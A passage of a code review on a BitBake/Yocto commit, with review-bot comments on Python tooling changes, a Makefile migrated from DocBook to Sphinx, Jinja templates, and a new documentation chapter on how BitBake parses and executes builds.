+ parser.add_argument("variable", help="variable name to query")
+ parser.add_argument("-r", "--recipe", help="Recipe name to query", default=None, required=False)
+ parser.add_argument('-u', '--unexpand', help='Do not expand the value (with --value)', action="store_true")
+ parser.add_argument('-f', '--flag', help='Specify a variable flag to query (with --value)', default=None)
+ parser.add_argument('--value', help='Only report the value, no history and no variable name', action="store_true")
+ args = parser.parse_args()
+
+ if args.unexpand and not args.value:
+ print("--unexpand only makes sense with --value")
+ sys.exit(1)
+
+ if args.flag and not args.value:
+ print("--flag only makes sense with --value")
+ sys.exit(1)
+
+ with bb.tinfoil.Tinfoil(tracking=True) as tinfoil:
+ if args.recipe:
+ tinfoil.prepare(quiet=2)
+ d = tinfoil.parse_recipe(args.recipe)
+ else:
+ tinfoil.prepare(quiet=2, config_only=True)
+ d = tinfoil.config_data
+ if args.flag:
+ print(str(d.getVarFlag(args.variable, args.flag, expand=(not args.unexpand))))
+ elif args.value:
+ print(str(d.getVar(args.variable, expand=(not args.unexpand))))
+ else:
+ bb.data.emit_var(args.variable, d=d, all=True)
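Review bot: The `--value` and `--flag` branches at the end of the `with` block wrap the lookup in `str()`, so an undefined variable or flag is printed as the text `None` and the script still exits 0 (assuming `getVar`/`getVarFlag` return `None` for a missing name, as they do elsewhere in BitBake). A build or release script that captures this output cannot tell "unset" from a real value. Bind the result first and fail loudly, e.g. `value = d.getVar(args.variable, expand=(not args.unexpand))` followed by `if value is None: sys.exit("%s is not defined" % args.variable)`. The two usage checks above would also be better as `parser.error("--flag only makes sense with --value")`, which writes to stderr instead of stdout.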
diff --git a/bitbake/bin/bitbake-worker b/bitbake/bin/bitbake-worker
index 97cc0fd60f..e3ce01eec8 100755
--- a/bitbake/bin/bitbake-worker
+++ b/bitbake/bin/bitbake-worker
@@ -413,9 +413,9 @@ class BitbakeWorker(object):
def handle_workerdata(self, data):
self.workerdata = pickle.loads(data)
+ bb.build.verboseShellLogging = self.workerdata["build_verbose_shell"]
+ bb.build.verboseStdoutLogging = self.workerdata["build_verbose_stdout"]
bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"]
- bb.msg.loggerDefaultVerbose = self.workerdata["logdefaultverbose"]
- bb.msg.loggerVerboseLogs = self.workerdata["logdefaultverboselogs"]
bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"]
for mc in self.databuilder.mcdata:
self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"])
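Review bot: The two added lookups `self.workerdata["build_verbose_shell"]` and `self.workerdata["build_verbose_stdout"]` index a dict that comes straight from `pickle.loads(data)`, and nothing in the function documents where that data comes from or which keys it must carry. I would add a comment above the `pickle.loads` line such as `# workerdata is unpickled from the cooker's pipe; only the trusted parent process may write to it`, because unpickling can execute arbitrary code, and list the keys the cooker is expected to send. A missing key here raises `KeyError` in the worker; the sending side is not in this hunk, so confirm it sets both new keys. `handle_workerdata` continues past the end of the hunk.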
@@ -505,9 +505,11 @@ except BaseException as e:
import traceback
sys.stderr.write(traceback.format_exc())
sys.stderr.write(str(e))
+finally:
+ worker_thread_exit = True
+ worker_thread.join()
-worker_thread_exit = True
-worker_thread.join()
-
-workerlog_write("exitting")
+workerlog_write("exiting")
+if not normalexit:
+ sys.exit(1)
sys.exit(0)
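Review bot: The tail of the script now ends in `if not normalexit:` / `sys.exit(1)` / `sys.exit(0)`, which reads more directly as `sys.exit(0 if normalexit else 1)`. `normalexit` is assigned outside this hunk; if it is only ever set inside the `try`, an early exception would turn this line into a `NameError`, so it is worth confirming it is initialised before the `try`. A one-line comment on `finally:` saying the worker thread is now joined on the error path as well would help, since the `try` body is not visible here.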
diff --git a/bitbake/doc/.gitignore b/bitbake/doc/.gitignore
new file mode 100644
index 0000000000..69fa449dd9
--- /dev/null
+++ b/bitbake/doc/.gitignore
@@ -0,0 +1 @@
+_build/
diff --git a/bitbake/doc/Makefile b/bitbake/doc/Makefile
index 3c28f4b222..4d721d30f3 100644
--- a/bitbake/doc/Makefile
+++ b/bitbake/doc/Makefile
@@ -1,91 +1,35 @@
-# This is a single Makefile to handle all generated BitBake documents.
-# The Makefile needs to live in the documentation directory and all figures used
-# in any manuals must be .PNG files and live in the individual book's figures
-# directory.
-#
-# The Makefile has these targets:
-#
-# pdf: generates a PDF version of a manual.
-# html: generates an HTML version of a manual.
-# tarball: creates a tarball for the doc files.
-# validate: validates
-# clean: removes files
-#
-# The Makefile generates an HTML version of every document. The
-# variable DOC indicates the folder name for a given manual.
-#
-# To build a manual, you must invoke 'make' with the DOC argument.
-#
-# Examples:
-#
-# make DOC=bitbake-user-manual
-# make pdf DOC=bitbake-user-manual
-#
-# The first example generates the HTML version of the User Manual.
-# The second example generates the PDF version of the User Manual.
+# Minimal makefile for Sphinx documentation
#
-ifeq ($(DOC),bitbake-user-manual)
-XSLTOPTS = --stringparam html.stylesheet bitbake-user-manual-style.css \
- --stringparam chapter.autolabel 1 \
- --stringparam section.autolabel 1 \
- --stringparam section.label.includes.component.label 1 \
- --xinclude
-ALLPREQ = html tarball
-TARFILES = bitbake-user-manual-style.css bitbake-user-manual.html figures/bitbake-title.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
+# You can set these variables from the command line, and also
+# from the environment for the first two.
+SPHINXOPTS ?=
+SPHINXBUILD ?= sphinx-build
+SOURCEDIR = .
+BUILDDIR = _build
+DESTDIR = final
+ifeq ($(shell if which $(SPHINXBUILD) >/dev/null 2>&1; then echo 1; else echo 0; fi),0)
+$(error "The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed")
endif
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your localy installed XSL stylesheets.
-XSL_BASE_URI = http://docbook.sourceforge.net/release/xsl/current
-XSL_XHTML_URI = $(XSL_BASE_URI)/xhtml/docbook.xsl
+# Put it first so that "make" without argument is like "make help".
+help:
+ @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
-all: $(ALLPREQ)
+.PHONY: help Makefile clean publish
-pdf:
-ifeq ($(DOC),bitbake-user-manual)
- @echo " "
- @echo "********** Building."$(DOC)
- @echo " "
- cd $(DOC); ../tools/docbook-to-pdf $(DOC).xml ../template; cd ..
-endif
-
-html:
-ifeq ($(DOC),bitbake-user-manual)
-# See http://www.sagehill.net/docbookxsl/HtmlOutput.html
- @echo " "
- @echo "******** Building "$(DOC)
- @echo " "
- cd $(DOC); xsltproc $(XSLTOPTS) -o $(DOC).html $(DOC)-customization.xsl $(DOC).xml; cd ..
-endif
-
-tarball: html
- @echo " "
- @echo "******** Creating Tarball of document files"
- @echo " "
- cd $(DOC); tar -cvzf $(DOC).tgz $(TARFILES); cd ..
-
-validate:
- cd $(DOC); xmllint --postvalid --xinclude --noout $(DOC).xml; cd ..
-
-publish:
- @if test -f $(DOC)/$(DOC).html; \
- then \
- echo " "; \
- echo "******** Publishing "$(DOC)".html"; \
- echo " "; \
- scp -r $(MANUALS) $(STYLESHEET) docs.yp:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
- cd $(DOC); scp -r $(FIGURES) docs.yp:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
- else \
- echo " "; \
- echo $(DOC)".html missing. Generate the file first then try again."; \
- echo " "; \
- fi
+publish: Makefile html singlehtml
+ rm -rf $(BUILDDIR)/$(DESTDIR)/
+ mkdir -p $(BUILDDIR)/$(DESTDIR)/
+ cp -r $(BUILDDIR)/html/* $(BUILDDIR)/$(DESTDIR)/
+ cp $(BUILDDIR)/singlehtml/index.html $(BUILDDIR)/$(DESTDIR)/singleindex.html
+ sed -i -e 's@index.html#@singleindex.html#@g' $(BUILDDIR)/$(DESTDIR)/singleindex.html
clean:
- rm -rf $(MANUALS); rm $(DOC)/$(DOC).tgz;
+ @rm -rf $(BUILDDIR)
+
+# Catch-all target: route all unknown targets to Sphinx using the new
+# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
+%: Makefile
+ @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
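Review bot: `publish` runs `rm -rf $(BUILDDIR)/$(DESTDIR)/` and `clean` runs `rm -rf $(BUILDDIR)` on variables that a command-line value (or an environment value under `make -e`) overrides, so an empty or unexpected `BUILDDIR` turns the first into a recursive delete of a path outside the doc tree. A guard as the first recipe line of `publish`, `@test -n "$(BUILDDIR)" -a -n "$(DESTDIR)"`, is cheap. Separately, the top-level `$(error ...)` check runs for every target, so `make clean` fails when Sphinx is not installed; wrapping the check in `ifneq ($(MAKECMDGOALS),clean)` would avoid that.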
diff --git a/bitbake/doc/README b/bitbake/doc/README
index 303cf8eec7..cbb5215d30 100644
--- a/bitbake/doc/README
+++ b/bitbake/doc/README
@@ -15,25 +15,41 @@ Each folder is self-contained regarding content and figures.
If you want to find HTML versions of the BitBake manuals on the web,
go to http://www.openembedded.org/wiki/Documentation.
-Makefile
-========
+Sphinx
+======
-The Makefile processes manual directories to create HTML, PDF,
-tarballs, etc. Details on how the Makefile work are documented
-inside the Makefile. See that file for more information.
+The BitBake documentation was migrated from the original DocBook
+format to Sphinx based documentation for the Yocto Project 3.2
+release.
-To build a manual, you run the make command and pass it the name
-of the folder containing the manual's contents.
-For example, the following command run from the documentation directory
-creates an HTML and a PDF version of the BitBake User Manual.
-The DOC variable specifies the manual you are making:
+Additional information related to the Sphinx migration, and guidelines
+for developers willing to contribute to the BitBake documentation can
+be found in the Yocto Project Documentation README file:
- $ make DOC=bitbake-user-manual
+https://git.yoctoproject.org/cgit/cgit.cgi/yocto-docs/tree/documentation/README
-template
-========
-Contains various templates, fonts, and some old PNG files.
+How to build the Yocto Project documentation
+============================================
-tools
-=====
-Contains a tool to convert the DocBook files to PDF format.
+Sphinx is written in Python. While it might work with Python2, for
+obvious reasons, we will only support building the BitBake
+documentation with Python3.
+
+Sphinx might be available in your Linux distro packages repositories,
+however it is not recommend using distro packages, as they might be
+old versions, especially if you are using an LTS version of your
+distro. The recommended method to install Sphinx and all required
+dependencies is to use the Python Package Index (pip).
+
+To install all required packages run:
+
+ $ pip3 install sphinx sphinx_rtd_theme pyyaml
+
+To build the documentation locally, run:
+
+ $ cd documentation
+ $ make html
+
+The resulting HTML index page will be _build/html/index.html, and you
+can browse your own copy of the locally generated documentation with
+your browser.
diff --git a/bitbake/doc/_templates/breadcrumbs.html b/bitbake/doc/_templates/breadcrumbs.html
new file mode 100644
index 0000000000..eb6244b74c
--- /dev/null
+++ b/bitbake/doc/_templates/breadcrumbs.html
@@ -0,0 +1,14 @@
+{% extends "!breadcrumbs.html" %}
+
+{% block breadcrumbs %}
+ <li>
+ <span class="doctype_switcher_placeholder">{{ doctype or 'single' }}</span>
+ <span class="version_switcher_placeholder">{{ release }}</span>
+ </li>
+ <li> &raquo;</li>
+ {% for doc in parents %}
+ <li><a href="{{ doc.link|e }}">{{ doc.title }}</a> &raquo;</li>
+ {% endfor %}
+ <li>{{ title }}</li>
+{% endblock %}
+
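Review bot: `{{ release }}` and `{{ doctype or 'single' }}` in the two placeholder spans are written without the `|e` filter that `doc.link` gets a few lines below, so unless autoescaping is enabled for this template they rely on those values never containing markup. Both presumably come from the Sphinx configuration, which makes this low risk, but `{{ release|e }}` and `{{ (doctype or 'single')|e }}` cost nothing and keep the escaping consistent. `doc.title` and `title` are best left as they are, since Sphinx passes them in as already-rendered HTML. A short `{# ... #}` comment saying what replaces the two `*_switcher_placeholder` spans would also help, because nothing in the template explains how they are filled.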
diff --git a/bitbake/doc/_templates/layout.html b/bitbake/doc/_templates/layout.html
new file mode 100644
index 0000000000..308d5c7a28
--- /dev/null
+++ b/bitbake/doc/_templates/layout.html
@@ -0,0 +1,7 @@
+{% extends "!layout.html" %}
+
+{% block extrabody %}
+<div id="outdated-warning" style="text-align: center; background-color: #FFBABA; color: #6A0E0E;">
+</div>
+{% endblock %}
+
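Review bot: The `outdated-warning` div carries its colours and alignment in an inline `style` attribute, which a Content-Security-Policy without `'unsafe-inline'` for styles would block; whether the documentation site sets such a policy is not visible here. The same commit adds `bitbake/doc/sphinx-static/theme_overrides.css`, so the rule could live there as `#outdated-warning { text-align: center; background-color: #FFBABA; color: #6A0E0E; }` and the template would keep only `<div id="outdated-warning"></div>`. The div is empty in the template, so a `{# ... #}` comment naming the code that fills it would help. If any part of that message comes from fetched data, that code should insert it as text rather than as markup.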
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-customization.xsl b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-customization.xsl
deleted file mode 100644
index 5985ea783f..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-customization.xsl
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
- <xsl:include href="../template/gloss-permalinks.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'user-manual-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="appendix.autolabel">A</xsl:param>
-
-<!-- <xsl:param name="generate.toc" select="'article nop'"></xsl:param> -->
-
-</xsl:stylesheet>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.rst
new file mode 100644
index 0000000000..a2fee4ec93
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.rst
@@ -0,0 +1,733 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+=========
+Execution
+=========
+
+|
+
+The primary purpose for running BitBake is to produce some kind of
+output such as a single installable package, a kernel, a software
+development kit, or even a full, board-specific bootable Linux image,
+complete with bootloader, kernel, and root filesystem. Of course, you
+can execute the ``bitbake`` command with options that cause it to
+execute single tasks, compile single recipe files, capture or clear
+data, or simply return information about the execution environment.
+
+This chapter describes BitBake's execution process from start to finish
+when you use it to create an image. The execution process is launched
+using the following command form: ::
+
+ $ bitbake target
+
+For information on
+the BitBake command and its options, see ":ref:`The BitBake Command
+<bitbake-user-manual-command>`" section.
+
+.. note::
+
+ Prior to executing BitBake, you should take advantage of available
+ parallel thread execution on your build host by setting the
+ :term:`BB_NUMBER_THREADS` variable in
+ your project's ``local.conf`` configuration file.
+
+ A common method to determine this value for your build host is to run
+ the following: ::
+
+ $ grep processor /proc/cpuinfo
+
+ This command returns
+ the number of processors, which takes into account hyper-threading.
+ Thus, a quad-core build host with hyper-threading most likely shows
+ eight processors, which is the value you would then assign to
+ ``BB_NUMBER_THREADS``.
+
+ A possibly simpler solution is that some Linux distributions (e.g.
+ Debian and Ubuntu) provide the ``ncpus`` command.
+
+Parsing the Base Configuration Metadata
+=======================================
+
+The first thing BitBake does is parse base configuration metadata. Base
+configuration metadata consists of your project's ``bblayers.conf`` file
+to determine what layers BitBake needs to recognize, all necessary
+``layer.conf`` files (one from each layer), and ``bitbake.conf``. The
+data itself is of various types:
+
+- **Recipes:** Details about particular pieces of software.
+
+- **Class Data:** An abstraction of common build information (e.g. how to
+ build a Linux kernel).
+
+- **Configuration Data:** Machine-specific settings, policy decisions,
+ and so forth. Configuration data acts as the glue to bind everything
+ together.
+
+The ``layer.conf`` files are used to construct key variables such as
+:term:`BBPATH` and :term:`BBFILES`.
+``BBPATH`` is used to search for configuration and class files under the
+``conf`` and ``classes`` directories, respectively. ``BBFILES`` is used
+to locate both recipe and recipe append files (``.bb`` and
+``.bbappend``). If there is no ``bblayers.conf`` file, it is assumed the
+user has set the ``BBPATH`` and ``BBFILES`` directly in the environment.
+
+Next, the ``bitbake.conf`` file is located using the ``BBPATH`` variable
+that was just constructed. The ``bitbake.conf`` file may also include
+other configuration files using the ``include`` or ``require``
+directives.
+
+Prior to parsing configuration files, BitBake looks at certain
+variables, including:
+
+- :term:`BB_ENV_WHITELIST`
+- :term:`BB_ENV_EXTRAWHITE`
+- :term:`BB_PRESERVE_ENV`
+- :term:`BB_ORIGENV`
+- :term:`BITBAKE_UI`
+
+The first four variables in this list relate to how BitBake treats shell
+environment variables during task execution. By default, BitBake cleans
+the environment variables and provides tight control over the shell
+execution environment. However, through the use of these first four
+variables, you can apply your control regarding the environment
+variables allowed to be used by BitBake in the shell during execution of
+tasks. See the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:Passing Information Into the Build Task Environment`"
+section and the information about these variables in the variable
+glossary for more information on how they work and on how to use them.
+
+The base configuration metadata is global and therefore affects all
+recipes and tasks that are executed.
+
+BitBake first searches the current working directory for an optional
+``conf/bblayers.conf`` configuration file. This file is expected to
+contain a :term:`BBLAYERS` variable that is a
+space-delimited list of 'layer' directories. Recall that if BitBake
+cannot find a ``bblayers.conf`` file, then it is assumed the user has
+set the ``BBPATH`` and ``BBFILES`` variables directly in the
+environment.
+
+For each directory (layer) in this list, a ``conf/layer.conf`` file is
+located and parsed with the :term:`LAYERDIR` variable
+being set to the directory where the layer was found. The idea is these
+files automatically set up :term:`BBPATH` and other
+variables correctly for a given build directory.
+
+BitBake then expects to find the ``conf/bitbake.conf`` file somewhere in
+the user-specified ``BBPATH``. That configuration file generally has
+include directives to pull in any other metadata such as files specific
+to the architecture, the machine, the local environment, and so forth.
+
+Only variable definitions and include directives are allowed in BitBake
+``.conf`` files. Some variables directly influence BitBake's behavior.
+These variables might have been set from the environment depending on
+the environment variables previously mentioned or set in the
+configuration files. The ":ref:`bitbake-user-manual/bitbake-user-manual-ref-variables:Variables Glossary`"
+chapter presents a full list of
+variables.
+
+After parsing configuration files, BitBake uses its rudimentary
+inheritance mechanism, which is through class files, to inherit some
+standard classes. BitBake parses a class when the inherit directive
+responsible for getting that class is encountered.
+
+The ``base.bbclass`` file is always included. Other classes that are
+specified in the configuration using the
+:term:`INHERIT` variable are also included. BitBake
+searches for class files in a ``classes`` subdirectory under the paths
+in ``BBPATH`` in the same way as configuration files.
+
+A good way to get an idea of the configuration files and the class files
+used in your execution environment is to run the following BitBake
+command: ::
+
+ $ bitbake -e > mybb.log
+
+Examining the top of the ``mybb.log``
+shows you the many configuration files and class files used in your
+execution environment.
+
+.. note::
+
+ You need to be aware of how BitBake parses curly braces. If a recipe
+ uses a closing curly brace within the function and the character has
+ no leading spaces, BitBake produces a parsing error. If you use a
+ pair of curly braces in a shell function, the closing curly brace
+ must not be located at the start of the line without leading spaces.
+
+ Here is an example that causes BitBake to produce a parsing error: ::
+
+ fakeroot create_shar() {
+ cat << "EOF" > ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
+ usage()
+ {
+ echo "test"
+ ###### The following "}" at the start of the line causes a parsing error ######
+ }
+ EOF
+ }
+
+ Writing the recipe this way avoids the error:
+ fakeroot create_shar() {
+ cat << "EOF" > ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
+ usage()
+ {
+ echo "test"
+ ###### The following "}" with a leading space at the start of the line avoids the error ######
+ }
+ EOF
+ }
+
+Locating and Parsing Recipes
+============================
+
+During the configuration phase, BitBake will have set
+:term:`BBFILES`. BitBake now uses it to construct a
+list of recipes to parse, along with any append files (``.bbappend``) to
+apply. ``BBFILES`` is a space-separated list of available files and
+supports wildcards. An example would be: ::
+
+ BBFILES = "/path/to/bbfiles/*.bb /path/to/appends/*.bbappend"
+
+BitBake parses each
+recipe and append file located with ``BBFILES`` and stores the values of
+various variables into the datastore.
+
+.. note::
+
+ Append files are applied in the order they are encountered in BBFILES.
+
+For each file, a fresh copy of the base configuration is made, then the
+recipe is parsed line by line. Any inherit statements cause BitBake to
+find and then parse class files (``.bbclass``) using
+:term:`BBPATH` as the search path. Finally, BitBake
+parses in order any append files found in ``BBFILES``.
+
+One common convention is to use the recipe filename to define pieces of
+metadata. For example, in ``bitbake.conf`` the recipe name and version
+are used to set the variables :term:`PN` and
+:term:`PV`: ::
+
+ PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
+ PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
+
+In this example, a recipe called "something_1.2.3.bb" would set
+``PN`` to "something" and ``PV`` to "1.2.3".
+
+By the time parsing is complete for a recipe, BitBake has a list of
+tasks that the recipe defines and a set of data consisting of keys and
+values as well as dependency information about the tasks.
+
+BitBake does not need all of this information. It only needs a small
+subset of the information to make decisions about the recipe.
+Consequently, BitBake caches the values in which it is interested and
+does not store the rest of the information. Experience has shown it is
+faster to re-parse the metadata than to try and write it out to the disk
+and then reload it.
+
+Where possible, subsequent BitBake commands reuse this cache of recipe
+information. The validity of this cache is determined by first computing
+a checksum of the base configuration data (see
+:term:`BB_HASHCONFIG_WHITELIST`) and
+then checking if the checksum matches. If that checksum matches what is
+in the cache and the recipe and class files have not changed, BitBake is
+able to use the cache. BitBake then reloads the cached information about
+the recipe instead of reparsing it from scratch.
+
+Recipe file collections exist to allow the user to have multiple
+repositories of ``.bb`` files that contain the same exact package. For
+example, one could easily use them to make one's own local copy of an
+upstream repository, but with custom modifications that one does not
+want upstream. Here is an example: ::
+
+ BBFILES = "/stuff/openembedded/*/*.bb /stuff/openembedded.modified/*/*.bb"
+ BBFILE_COLLECTIONS = "upstream local"
+ BBFILE_PATTERN_upstream = "^/stuff/openembedded/"
+ BBFILE_PATTERN_local = "^/stuff/openembedded.modified/"
+ BBFILE_PRIORITY_upstream = "5" BBFILE_PRIORITY_local = "10"
+
+.. note::
+
+ The layers mechanism is now the preferred method of collecting code.
+ While the collections code remains, its main use is to set layer
+ priorities and to deal with overlap (conflicts) between layers.
+
+.. _bb-bitbake-providers:
+
+Providers
+=========
+
+Assuming BitBake has been instructed to execute a target and that all
+the recipe files have been parsed, BitBake starts to figure out how to
+build the target. BitBake looks through the ``PROVIDES`` list for each
+of the recipes. A ``PROVIDES`` list is the list of names by which the
+recipe can be known. Each recipe's ``PROVIDES`` list is created
+implicitly through the recipe's :term:`PN` variable and
+explicitly through the recipe's :term:`PROVIDES`
+variable, which is optional.
+
+When a recipe uses ``PROVIDES``, that recipe's functionality can be
+found under an alternative name or names other than the implicit ``PN``
+name. As an example, suppose a recipe named ``keyboard_1.0.bb``
+contained the following: ::
+
+ PROVIDES += "fullkeyboard"
+
+The ``PROVIDES``
+list for this recipe becomes "keyboard", which is implicit, and
+"fullkeyboard", which is explicit. Consequently, the functionality found
+in ``keyboard_1.0.bb`` can be found under two different names.
+
+.. _bb-bitbake-preferences:
+
+Preferences
+===========
+
+The ``PROVIDES`` list is only part of the solution for figuring out a
+target's recipes. Because targets might have multiple providers, BitBake
+needs to prioritize providers by determining provider preferences.
+
+A common example in which a target has multiple providers is
+"virtual/kernel", which is on the ``PROVIDES`` list for each kernel
+recipe. Each machine often selects the best kernel provider by using a
+line similar to the following in the machine configuration file: ::
+
+ PREFERRED_PROVIDER_virtual/kernel = "linux-yocto"
+
+The default :term:`PREFERRED_PROVIDER` is the provider
+with the same name as the target. BitBake iterates through each target
+it needs to build and resolves them and their dependencies using this
+process.
+
+Understanding how providers are chosen is made complicated by the fact
+that multiple versions might exist for a given provider. BitBake
+defaults to the highest version of a provider. Version comparisons are
+made using the same method as Debian. You can use the
+:term:`PREFERRED_VERSION` variable to
+specify a particular version. You can influence the order by using the
+:term:`DEFAULT_PREFERENCE` variable.
+
+By default, files have a preference of "0". Setting
+``DEFAULT_PREFERENCE`` to "-1" makes the recipe unlikely to be used
+unless it is explicitly referenced. Setting ``DEFAULT_PREFERENCE`` to
+"1" makes it likely the recipe is used. ``PREFERRED_VERSION`` overrides
+any ``DEFAULT_PREFERENCE`` setting. ``DEFAULT_PREFERENCE`` is often used
+to mark newer and more experimental recipe versions until they have
+undergone sufficient testing to be considered stable.
+
+When there are multiple "versions" of a given recipe, BitBake defaults
+to selecting the most recent version, unless otherwise specified. If the
+recipe in question has a
+:term:`DEFAULT_PREFERENCE` set lower than
+the other recipes (default is 0), then it will not be selected. This
+allows the person or persons maintaining the repository of recipe files
+to specify their preference for the default selected version.
+Additionally, the user can specify their preferred version.
+
+If the first recipe is named ``a_1.1.bb``, then the
+:term:`PN` variable will be set to "a", and the
+:term:`PV` variable will be set to 1.1.
+
+Thus, if a recipe named ``a_1.2.bb`` exists, BitBake will choose 1.2 by
+default. However, if you define the following variable in a ``.conf``
+file that BitBake parses, you can change that preference: ::
+
+ PREFERRED_VERSION_a = "1.1"
+
+.. note::
+
+ It is common for a recipe to provide two versions -- a stable,
+ numbered (and preferred) version, and a version that is automatically
+ checked out from a source code repository that is considered more
+ "bleeding edge" but can be selected only explicitly.
+
+ For example, in the OpenEmbedded codebase, there is a standard,
+ versioned recipe file for BusyBox, ``busybox_1.22.1.bb``, but there
+ is also a Git-based version, ``busybox_git.bb``, which explicitly
+ contains the line ::
+
+ DEFAULT_PREFERENCE = "-1"
+
+ to ensure that the
+ numbered, stable version is always preferred unless the developer
+ selects otherwise.
+
+.. _bb-bitbake-dependencies:
+
+Dependencies
+============
+
+Each target BitBake builds consists of multiple tasks such as ``fetch``,
+``unpack``, ``patch``, ``configure``, and ``compile``. For best
+performance on multi-core systems, BitBake considers each task as an
+independent entity with its own set of dependencies.
+
+Dependencies are defined through several variables. You can find
+information about variables BitBake uses in the
+:doc:`bitbake-user-manual-ref-variables` near the end of this manual. At a
+basic level, it is sufficient to know that BitBake uses the
+:term:`DEPENDS` and
+:term:`RDEPENDS` variables when calculating
+dependencies.
+
+For more information on how BitBake handles dependencies, see the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:Dependencies`
+section.
+
+.. _ref-bitbake-tasklist:
+
+The Task List
+=============
+
+Based on the generated list of providers and the dependency information,
+BitBake can now calculate exactly what tasks it needs to run and in what
+order it needs to run them. The
+:ref:`bitbake-user-manual/bitbake-user-manual-execution:executing tasks`
+section has more information on how BitBake chooses which task to
+execute next.
+
+The build now starts with BitBake forking off threads up to the limit
+set in the :term:`BB_NUMBER_THREADS`
+variable. BitBake continues to fork threads as long as there are tasks
+ready to run, those tasks have all their dependencies met, and the
+thread threshold has not been exceeded.
+
+It is worth noting that you can greatly speed up the build time by
+properly setting the ``BB_NUMBER_THREADS`` variable.
+
+As each task completes, a timestamp is written to the directory
+specified by the :term:`STAMP` variable. On subsequent
+runs, BitBake looks in the build directory within ``tmp/stamps`` and
+does not rerun tasks that are already completed unless a timestamp is
+found to be invalid. Currently, invalid timestamps are only considered
+on a per recipe file basis. So, for example, if the configure stamp has
+a timestamp greater than the compile timestamp for a given target, then
+the compile task would rerun. Running the compile task again, however,
+has no effect on other providers that depend on that target.
+
+The exact format of the stamps is partly configurable. In modern
+versions of BitBake, a hash is appended to the stamp so that if the
+configuration changes, the stamp becomes invalid and the task is
+automatically rerun. This hash, or signature used, is governed by the
+signature policy that is configured (see the
+:ref:`bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)`
+section for information). It is also
+possible to append extra metadata to the stamp using the
+``[stamp-extra-info]`` task flag. For example, OpenEmbedded uses this
+flag to make some tasks machine-specific.
+
+.. note::
+
+ Some tasks are marked as "nostamp" tasks. No timestamp file is
+ created when these tasks are run. Consequently, "nostamp" tasks are
+ always rerun.
+
+For more information on tasks, see the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:tasks` section.
+
+Executing Tasks
+===============
+
+Tasks can be either a shell task or a Python task. For shell tasks,
+BitBake writes a shell script to
+``${``\ :term:`T`\ ``}/run.do_taskname.pid`` and then
+executes the script. The generated shell script contains all the
+exported variables, and the shell functions with all variables expanded.
+Output from the shell script goes to the file
+``${T}/log.do_taskname.pid``. Looking at the expanded shell functions in
+the run file and the output in the log files is a useful debugging
+technique.
+
+For Python tasks, BitBake executes the task internally and logs
+information to the controlling terminal. Future versions of BitBake will
+write the functions to files similar to the way shell tasks are handled.
+Logging will be handled in a way similar to shell tasks as well.
+
+The order in which BitBake runs the tasks is controlled by its task
+scheduler. It is possible to configure the scheduler and define custom
+implementations for specific use cases. For more information, see these
+variables that control the behavior:
+
+- :term:`BB_SCHEDULER`
+
+- :term:`BB_SCHEDULERS`
+
+It is possible to have functions run before and after a task's main
+function. This is done using the ``[prefuncs]`` and ``[postfuncs]``
+flags of the task that lists the functions to run.
+
+.. _checksums:
+
+Checksums (Signatures)
+======================
+
+A checksum is a unique signature of a task's inputs. The signature of a
+task can be used to determine if a task needs to be run. Because it is a
+change in a task's inputs that triggers running the task, BitBake needs
+to detect all the inputs to a given task. For shell tasks, this turns
+out to be fairly easy because BitBake generates a "run" shell script for
+each task and it is possible to create a checksum that gives you a good
+idea of when the task's data changes.
+
+To complicate the problem, some things should not be included in the
+checksum. First, there is the actual specific build path of a given task
+- the working directory. It does not matter if the working directory
+changes because it should not affect the output for target packages. The
+simplistic approach for excluding the working directory is to set it to
+some fixed value and create the checksum for the "run" script. BitBake
+goes one step better and uses the
+:term:`BB_HASHBASE_WHITELIST` variable
+to define a list of variables that should never be included when
+generating the signatures.
+
